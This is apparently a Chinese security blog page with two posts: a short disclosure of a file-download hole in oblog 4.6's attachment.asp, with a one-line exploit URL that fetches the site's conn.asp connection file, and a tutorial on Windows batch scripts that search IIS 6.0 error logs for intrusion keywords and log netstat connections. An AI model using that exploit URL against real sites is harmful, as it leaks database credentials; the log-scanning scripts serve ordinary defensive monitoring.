popphen.net.ru
  • 1 
预览模式: 普通 | 列表

oblog文件下载漏洞

oblog文件下载漏洞
漏洞存在版本4.6sql+access,一路跟踪下去吧
漏洞文件:attachment.asp
利用很简单:http://test.cn/attachment.asp?path=./conn.asp 即可下载CONN
<!-- #include file="inc/inc_syssite.asp" -->
<%
Dim Path,rs

[阅读全文]

使用Bat文件自定义入侵检测脚本








以下是引用片段:
Time /t &gt;&gt; IIS-Scan.log 
Find /i &quot;需要查找的字符&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 





上面这个 Bat 呢.可以很方便的查找 IIS 6.0 的日志文件里的入侵数据.
我们都知道.Windows 2003 Server的IIS里面有个专有的 &quot;Httperr&quot; 这个文件夹.
专门记录相关的错误.当然.如果你用扫描软件对服务器进行扫描的话呢.
肯定都会被记录在这里.这个 Bat 文件使用了 Find.exe 命令.

第一行是记录服务器时间.并写入名为 IIS-Scan.Log 这个文件里.
第二行.查找.参数 i 是不区分大小写.然后在 &quot;&quot; 里面输入自己需要查找的字符串.
比如经常会出现 &quot;../..&quot; 这样的扫描记录.或者是 &quot;%&amp;&quot; 这样的U码试探.
&quot;*.*&quot; 是查询 &quot;Httperr&quot; 这整个目录的所有文件.并把查找的结果写入IIS-Scan.log.

下面是我自己服务器上用的一套完整的脚本!









以下是引用片段:
@Cd / 
Rem ********  Auto Scan IIS 6.0 LogFiles By www.Reistlin.com ******** 
Rem          ******** Scaning...Please...Waiting... ******** 
@Echo Off 
Time /t &gt;&gt; IIS-Scan.log 
Find /i &quot;..&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;//&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;//&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;windows&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;private&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;printer&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;session&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;admin&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;winnt&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;null&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;boot&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;www&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;asa&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;mdb&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;dat&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;bat&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;rpc&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;bin&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;vti&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;doc&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;cgi&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;log&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;iis&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;ida&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;idc&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Find /i &quot;idq&quot; C:/WINDOWS/system32/LogFiles/Httperr/*.* &gt;&gt; IIS-Scan.log 
Start IIS-Scan.log 











以下是引用片段:
Time /t &gt;&gt; Port.log 
Netstat -NA -P Tcp 600 &gt;&gt; Port.log 



上面这个.使用NETSTAT -NA命令.查询连接数和端口数.并写入Port.log.
注意那个 600 的意思是 600秒.也就是每 600 秒记录一次.
慎重使用.因为一分钟记录一次.会导致 Port.log 文件随着时间的推移而越来越大.
我们还是推荐使用6000吧.或者3000秒也可以.半个小时记录一次不过分吧. 









以下是引用片段:
Time /t &gt;&gt; 3389.log  
Netstat -n -p tcp | Find &quot;:3389&quot; &gt;&gt; 3389.log 

  • 1